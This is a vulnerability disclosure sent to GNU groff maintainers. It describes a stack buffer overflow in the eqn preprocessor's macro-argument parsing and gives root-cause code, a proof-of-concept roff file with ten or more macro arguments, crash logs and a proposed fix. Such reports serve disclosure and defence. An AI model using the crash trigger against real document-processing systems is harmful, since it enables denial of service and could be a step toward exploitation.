Hello maintainers, we have discovered a memory bug in the new version of
groff.
# GNU groff 1.24.0: Stack-based buffer overflow (CWE-121) in eqn
interpolate_macro_with_args() via oversized macro argument list
## Summary
- **CWE**: CWE-121 (Stack-based Buffer Overflow)
- **Vendor**: GNU Project
- **Product**: GNU groff (`eqn` preprocessor; reachable through `groff -e`)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU eqn/groff 1.24.0)
and GNU groff 1.23.0 release (`/usr/bin/eqn` on Ubuntu 24.04)
- **Affected Component(s)**:
- `src/preproc/eqn/lex.cpp`, `interpolate_macro_with_args()` — parses
comma-separated macro arguments into a fixed-size stack array `char
*argv[9]` without bounds checking, allowing the 10th and later arguments to
be written past the end of the stack array.
- `src/preproc/eqn/lex.cpp`,
`argument_macro_input::argument_macro_input()` — trusts the unbounded
argument count and copies it into another fixed 9-slot argument array.
- **Attack Type / Vector**: Local file parsing — via a crafted roff/eqn
document containing an `eqn` macro invocation with more than 9
comma-separated arguments.
- **Impact**:
- Local Denial of Service (crash via stack corruption and `SIGABRT`).
- Potential code execution on builds without stack-protector mitigations,
because the root cause is an out-of-bounds write of attacker-controlled
pointers past a stack array.
This report is independent from the companion GNU groff `pre-grohtml`
CWE-78 report. They affect different groff components and different attack
surfaces: this issue is a memory-corruption bug in the `eqn` parser, while
the companion report is command injection in the HTML preprocessing
pipeline.
---
## Technical Details / Root Cause
In GNU groff, the `eqn` preprocessor supports user-defined macros inside
`.EQ` / `.EN` equation blocks. A macro can be defined with the `define`
primitive and invoked with a comma-separated argument list. The
vulnerability is in the interaction between macro argument parsing and
fixed-size arrays used to hold those arguments.
The vulnerable path is reached when `get_token()` sees a non-simple macro
followed by an opening parenthesis:
```cpp
if (!quoted && lookup_flag != 0 && c == '(') {
token_buffer += '\0';
definition *def = macro_table.lookup(token_buffer.contents());
if (def && def->is_macro && !def->is_simple) {
(void)get_char(); // skip initial '('
interpolate_macro_with_args(def->contents);
break_flag = 1;
break;
}
token_buffer.set_length(token_buffer.length() - 1);
}
```
A document-controlled macro definition created by `define` is a non-simple
macro (`is_simple == 0`), so a document like the following enters this path:
```roff
.EQ
define foo X x X
foo(z,z,z,z,z,z,z,z,z,z)
.EN
```
The root cause is in `interpolate_macro_with_args()`:
1. **Fixed-size stack array**: `interpolate_macro_with_args()` declares a
stack array with exactly 9 pointer slots:
```cpp
static void interpolate_macro_with_args(const char *body)
{
char *argv[9];
int argc = 0;
int i;
for (i = 0; i < 9; i++)
argv[i] = 0;
...
```
2. **Unbounded macro-argument parsing loop**: Each parsed argument is
stored in `argv[argc]`, but `argc` is not checked before the store:
```cpp
if (level == 0 && (c == ',' || c == ')')) {
if (token_buffer.length() > 0) {
token_buffer += '\0';
argv[argc] = strsave(token_buffer.contents()); // <-- no bounds
check
}
// for 'foo()', argc = 0
if (argc > 0 || c != ')' || i > 0)
argc++;
break;
}
```
`argv[]` has valid indices `0..8`. The 10th macro argument is stored at
`argv[9]`, one pointer past the end of the stack array. Larger argument
counts continue writing attacker-controlled heap pointers farther beyond
the array.
3. **The unbounded count is propagated**: The unbounded `argc` value is
then passed to `argument_macro_input`, which also contains a fixed 9-slot
argument array:
```cpp
class argument_macro_input: public input {
char *s;
char *p;
char *ap;
int argc;
char *argv[9];
public:
argument_macro_input(const char *, int, char **, input *);
~argument_macro_input();
int get();
int peek();
};
```
Its constructor trusts `argc` and copies all supplied argument pointers:
```cpp
argument_macro_input::argument_macro_input(const char *body, int ac,
char **av, input *x)
: input(x), ap(0), argc(ac)
{
int i;
for (i = 0; i < argc; i++)
argv[i] = av[i];
...
}
```
No length validation exists on this path. The crafted document controls the
number of comma-separated macro arguments, and the 10th argument is
sufficient to overflow the stack array in `interpolate_macro_with_args()`.
---
## Reproduction (PoC)
The crash is reproducible on the default upstream build of GNU groff on
Linux. No sanitizers, valgrind, or instrumentation are required.
```sh
# Create a roff document containing an eqn macro invocation with 50
arguments
python3 - <<'PY' > /tmp/eqn_macro_50.roff
n = 50
print('.EQ')
print('define foo X x X')
print('foo(' + ','.join(['z'] * n) + ')')
print('.EN')
PY
# Invoke the stock eqn binary from a default upstream build
./eqn /tmp/eqn_macro_50.roff >/tmp/eqn.out 2>/tmp/eqn.err
echo "exit=$?"
sed -n '1,3p' /tmp/eqn.err
```
The generated PoC file `/tmp/eqn_macro_50.roff` contains the following eqn
input. This preview shows that the trigger is a normal equation block with
one macro definition and an oversized macro argument list:
```roff
.EQ
define foo X x X
foo(z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z,z)
.EN
```
Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:
```text
GNU eqn (groff) version 1.24.0
exit=134
*** stack smashing detected ***: terminated
```
`exit=134` corresponds to termination by signal `134 - 128 = 6`
(`SIGABRT`). The `*** stack smashing detected ***` diagnostic is emitted by
the stock glibc stack protector after the fixed stack array in
`interpolate_macro_with_args()` is overwritten.
The overflow boundary is exact for the fixed 9-slot array: 9 arguments are
accepted, while the 10th argument overflows the stack array and aborts the
process:
```text
N=9 exit=0
N=10 exit=134
*** stack smashing detected ***: terminated
N=50 exit=134
*** stack smashing detected ***: terminated
```
The same input is also reachable through the normal `groff -e` pipeline:
```sh
./test-groff -e -Tps /tmp/eqn_macro_50.roff >/tmp/groff_pipeline.out
2>/tmp/groff_pipeline.err
echo "groff -e exit=$?"
sed -n '1,6p' /tmp/groff_pipeline.err
```
Observed result:
```text
groff -e exit=8
*** stack smashing detected ***: terminated
/home/zijian/groff_master/groff: error: eqn: Aborted (core dumped)
```
A cross-check against Ubuntu 24.04's system GNU groff 1.23.0 release also
reproduces the same crash:
```text
GNU eqn (groff) version 1.23.0
system eqn exit=134
*** stack smashing detected ***: terminated
```
---
## Fix / Mitigation
In `interpolate_macro_with_args()`, either reject excessive macro arguments
before writing into `argv[argc]`, or replace the fixed-size arrays with
dynamically grown storage. Since eqn macro parameters are referenced only
as `$1` through `$9`, rejecting the 10th and later arguments is the
simplest safe behavior.
Sketch of a fix:
```cpp
if (token_buffer.length() > 0) {
if (argc >= 9) {
lex_error("too many arguments in macro invocation");
// Discard remaining arguments up to the matching ')' and free any
// already allocated argv[] entries before returning.
return;
}
token_buffer += '\0';
argv[argc] = strsave(token_buffer.contents());
}
```
The constructor of `argument_macro_input` should also defensively cap or
validate `ac` before copying into its own `argv[9]` member array.
### Recommended Mitigations
- **Preferred**: Apply an upstream patch that bounds `argc` before every
write to `argv[argc]` in `interpolate_macro_with_args()` and before every
copy into `argument_macro_input::argv`.
- If patching is not immediately possible:
- Avoid running `eqn` or `groff -e` on untrusted roff documents, or
- Sandbox the `eqn` / `groff -e` pipeline when processing untrusted
documents.
Thank you.